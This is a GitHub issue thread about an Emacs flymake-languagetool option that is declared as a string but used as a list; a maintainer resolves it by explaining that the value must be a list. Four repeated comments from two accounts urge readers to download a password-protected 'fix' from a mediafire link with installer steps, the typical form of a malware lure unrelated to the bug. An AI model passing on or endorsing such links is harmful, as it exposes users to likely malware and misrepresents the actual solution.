### ISSUE TITLE
flymake-languagetool-server-command should be of type list

### ISSUE THREAD

**Issue by telenieko** [emacs-languagetool/flymake-languagetool#28]
Hi,

https://github.com/emacs-languagetool/flymake-languagetool/blob/e52307cdd7b1708171b32e6f928bc482e1237a83/flymake-languagetool.el#L109-L113

`flymake-languagetool-server-command` is defined as `string`, but later on `flymake-languagetool--start-server` it is used in place of a list:

https://github.com/emacs-languagetool/flymake-languagetool/blob/e52307cdd7b1708171b32e6f928bc482e1237a83/flymake-languagetool.el#L392-L396

which results in

    Debugger entered--Lisp error: (wrong-type-argument stringp 108)
      flymake-languagetool--start-server(nil)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jcs090218** [comment]
You should assign it to a list. 🤔

**Comment by telenieko** [comment]
My bad, didn't realise that `   :type '(repeat string) ` means "a list of strings". !!
